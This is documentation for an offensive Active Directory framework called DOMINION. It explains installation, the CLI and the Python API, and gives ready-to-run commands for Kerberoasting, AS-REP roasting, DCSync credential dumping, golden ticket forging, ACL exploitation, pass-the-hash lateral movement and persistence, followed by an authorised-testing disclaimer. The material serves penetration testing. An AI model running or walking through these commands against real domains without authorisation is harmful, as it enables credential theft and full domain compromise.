DOMINION Documentation

Red Specter DOMINION

Pure Python Active Directory Attack Framework — 9 modules. 1,866 tests. 4 protocols. Zero .NET dependencies.

v1.0.0
Contents
Overview Installation Quick Start ENUMERATE — AD Enumeration PATHFIND — Attack Path Mapping KERBEROS — Kerberos Attacks NTLM — NTLM Attacks SECRETS — Credential Extraction GPO — Group Policy Abuse ACL — ACL Abuse LATERAL — Lateral Movement PERSIST — Domain Persistence UNLEASHED Mode CLI Reference Kill Chain Integration API Reference Disclaimer

Overview

DOMINION is a pure Python Active Directory attack framework. Every protocol — LDAP, Kerberos, SMB, DRSUAPI — implemented from scratch using Python's socket, struct, and ssl modules. No Impacket. No .NET. No PowerShell. No Rubeus. No Mimikatz. Pure engineering.

Nine modules. 1,866 tests. DOMINION enumerates Active Directory, maps attack paths to Domain Admin, exploits Kerberos and NTLM weaknesses, extracts secrets via DCSync, moves laterally across the domain, and establishes persistence — all from a single pure Python tool.

Pure Python Zero compiled dependencies. No Impacket. No .NET. No PowerShell.
9 Modules Enumerate, Pathfind, Kerberos, NTLM, Secrets, GPO, ACL, Lateral, Persist.
1,866 Tests Full test coverage across every module and protocol.
4 Protocols LDAP, Kerberos, SMB, DRSUAPI — all pure Python.

Installation

$ pip install red-specter-dominion

Also available as .deb and PKGBUILD (BlackArch).

Or from source:

$ git clone <repo> $ cd red-specter-dominion $ pip install -e ".[dev]"

Quick Start

# Enumerate domain $ dominion enumerate --dc dc01.corp.local --domain corp.local --user jsmith --password P@ssw0rd # Find path to Domain Admin $ dominion pathfind --dc dc01.corp.local --target "Domain Admins" # Kerberoast $ dominion kerberoast --dc dc01.corp.local # DCSync (UNLEASHED) $ dominion dcsync --dc dc01.corp.local --user krbtgt --override --confirm-destroy # BloodHound export $ dominion bloodhound --dc dc01.corp.local --output bloodhound_data/

ENUMERATE — AD Enumeration

Full Active Directory enumeration via native LDAP implementation. 50+ built-in queries for users, groups, computers, trusts, GPOs, SPNs, OUs, and ACLs.

Capabilities dominion enumerate
# Full enumeration $ dominion enumerate --dc dc01.corp.local --domain corp.local # Users only $ dominion users --dc dc01.corp.local # Groups with membership $ dominion groups --dc dc01.corp.local --recursive # Computer objects $ dominion computers --dc dc01.corp.local # Domain trusts $ dominion trusts --dc dc01.corp.local

PATHFIND — Attack Path Mapping

BloodHound-style attack path discovery. Shortest path to Domain Admin through ACL chains, delegation abuse, trust relationships, and group nesting.

Capabilities dominion pathfind
# Find path to Domain Admins $ dominion pathfind --dc dc01.corp.local --target "Domain Admins" # All paths (not just shortest) $ dominion pathfind --dc dc01.corp.local --target "Domain Admins" --all-paths

KERBEROS — Kerberos Attacks

Pure Python Kerberos implementation. ASN.1 message construction, RC4-HMAC encryption, and full attack coverage — Kerberoast, AS-REP Roast, Golden/Silver Tickets, S4U delegation abuse.

01 Kerberoast

Request TGS tickets for accounts with SPNs set. Extract RC4-HMAC encrypted tickets for offline cracking with GHOUL. Pure Python TGS-REQ construction.

02 AS-REP Roast

Target accounts with Kerberos pre-authentication disabled. Request AS-REP without credentials and extract hashes for offline cracking.

03 Golden / Silver Tickets (UNLEASHED)

Forge Kerberos tickets using extracted krbtgt or service account hashes. Golden Ticket provides unrestricted domain access. Silver Ticket targets individual services.

# Kerberoast — extract TGS hashes $ dominion kerberoast --dc dc01.corp.local # AS-REP Roast $ dominion asreproast --dc dc01.corp.local # Golden Ticket (UNLEASHED) $ dominion persist --golden --krbtgt-hash HASH --override --confirm-destroy

NTLM — NTLM Attacks

Pure Python NTLM implementation. Pass-the-Hash, NTLM relay, NTLMv2 capture. Challenge-response authentication built from protocol specification.

Capabilities

SECRETS — Credential Extraction

Domain secret extraction via DCSync and direct database parsing. Pure Python DRSUAPI implementation for domain replication.

Capabilities dominion secrets / dominion dcsync
# DCSync krbtgt (UNLEASHED) $ dominion dcsync --dc dc01.corp.local --user krbtgt --override --confirm-destroy # DCSync all users (UNLEASHED) $ dominion dcsync --dc dc01.corp.local --all --override --confirm-destroy # LAPS password retrieval $ dominion secrets --laps --dc dc01.corp.local

GPO — Group Policy Abuse

Group Policy exploitation. GPP password extraction, GPO modification for code execution, and scheduled task creation via policy.

Capabilities dominion gpo

ACL — ACL Abuse

ACL analysis and exploitation. 17+ dangerous ACE types identified. Shadow Credentials and AD CS abuse (ESC1-ESC8).

17+ Dangerous ACEs dominion acl
# Scan for abusable ACLs $ dominion acl --dc dc01.corp.local --scan # Exploit WriteDACL (UNLEASHED) $ dominion acl --exploit WriteDACL --target "Domain Admins" --override --confirm-destroy

LATERAL — Lateral Movement

Pure Python lateral movement across Active Directory. Six execution methods implemented from protocol specifications.

Execution Methods dominion lateral
# WMI execution (UNLEASHED) $ dominion lateral --method wmi --target server01.corp.local --command "whoami" --override --confirm-destroy # PSExec with hash (UNLEASHED) $ dominion lateral --method psexec --target server01.corp.local --hash NTLM_HASH --override --confirm-destroy

PERSIST — Domain Persistence

Domain persistence mechanisms. All UNLEASHED only — these operations modify Active Directory.

Persistence Methods dominion persist

DOMINION UNLEASHED

Cryptographic override. Private key controlled. One operator. Founder's machine only.

Standard mode enumerates and assesses. UNLEASHED mode executes attacks. DCSync, Golden Tickets, ACL exploitation, lateral movement, persistence — all require UNLEASHED.

CapabilityStandardUNLEASHED
EnumerationFull LDAPFull + recursive + BloodHound
KerberoastIdentify SPNsRequest tickets, extract hashes
DCSyncCheck privilegesFull domain replication
Golden TicketCheck requirementsForge and inject
ACL abuseIdentify ACEsExecute exploitation
Lateral movementIdentify targetsExecute WMI/PSExec/WinRM
PersistenceDocument methodsDeploy mechanisms
Key requiredNoEd25519
# UNLEASHED — full domain compromise $ dominion dcsync --dc dc01.corp.local --all --override --confirm-destroy

UNLEASHED mode is restricted to authorised operators with Ed25519 private key access. The key must be present at ~/.redspecter/override_private.pem. Both --override and --confirm-destroy flags are required. The gate is cryptographic. There is no bypass. Executing attacks against Active Directory will modify domain objects and may disrupt production services.

CLI Reference

Commands

CommandDescription
dominion enumerateFull domain enumeration
dominion usersEnumerate domain users
dominion groupsEnumerate groups and memberships
dominion computersEnumerate computer objects
dominion trustsEnumerate domain trusts
dominion pathfindMap attack paths to target
dominion kerberoastKerberoast — extract TGS hashes
dominion asreproastAS-REP Roast — extract AS-REP hashes
dominion dcsyncDCSync — domain replication (UNLEASHED)
dominion secretsExtract LAPS, gMSA, LSA, DPAPI
dominion gpoGPO enumeration and exploitation
dominion aclACL analysis and exploitation
dominion lateralLateral movement execution (UNLEASHED)
dominion persistPersistence deployment (UNLEASHED)
dominion bloodhoundBloodHound-compatible JSON export

Connection Options

FlagDescription
--dcDomain controller hostname or IP
--domainDomain FQDN
--userUsername for authentication
--passwordPassword for authentication
--hashNTLM hash for Pass-the-Hash
--ticketKerberos ticket (.ccache) for auth
--ldapsUse LDAPS (port 636)
--overrideUNLEASHED dry-run
--confirm-destroyUNLEASHED live execution
--outputOutput directory for results

Kill Chain Integration

DOMINION operates as the final stage in the Red Specter traditional infrastructure attack chain. WRAITH finds. REAPER exploits. GHOUL cracks. DOMINION conquers the domain.

01 WRAITH Scans
02 REAPER Exploits
03 GHOUL Cracks
04 DOMINION Conquers
GHOUL → DOMINION Cracked Kerberos hashes enable DCSync and domain persistence.
DOMINION → GHOUL Kerberoast and AS-REP hashes feed into GHOUL for cracking.
WRAITH → DOMINION Network discovery identifies DCs, LDAP ports, and Kerberos services.
NEMESIS Orchestration Domain compromise feeds into AI infrastructure exploitation chains.

API Reference

DOMINION exposes a Python API for programmatic integration.

# Enumerate domain from dominion import enumerate_domain results = enumerate_domain( dc="dc01.corp.local", domain="corp.local", username="jsmith", password="P@ssw0rd" ) # Find attack paths from dominion import pathfind paths = pathfind( dc="dc01.corp.local", target="Domain Admins" ) # Kerberoast from dominion import kerberoast hashes = kerberoast(dc="dc01.corp.local") # BloodHound export from dominion import bloodhound_export bloodhound_export( dc="dc01.corp.local", output_dir="bloodhound_data/" )

Disclaimer

Red Specter DOMINION is designed for authorised security testing, research, and educational purposes only. You must have explicit written permission from the domain owner before running any DOMINION tool against Active Directory. DOMINION operations — especially DCSync, lateral movement, and persistence — will modify domain objects and may disrupt production services. Testing must only be performed against systems you are authorised to test. Unauthorised use may violate the Computer Misuse Act 1990 (UK), the Computer Fraud and Abuse Act (US), or equivalent legislation in your jurisdiction. The authors accept no liability for misuse or damage resulting from improper use.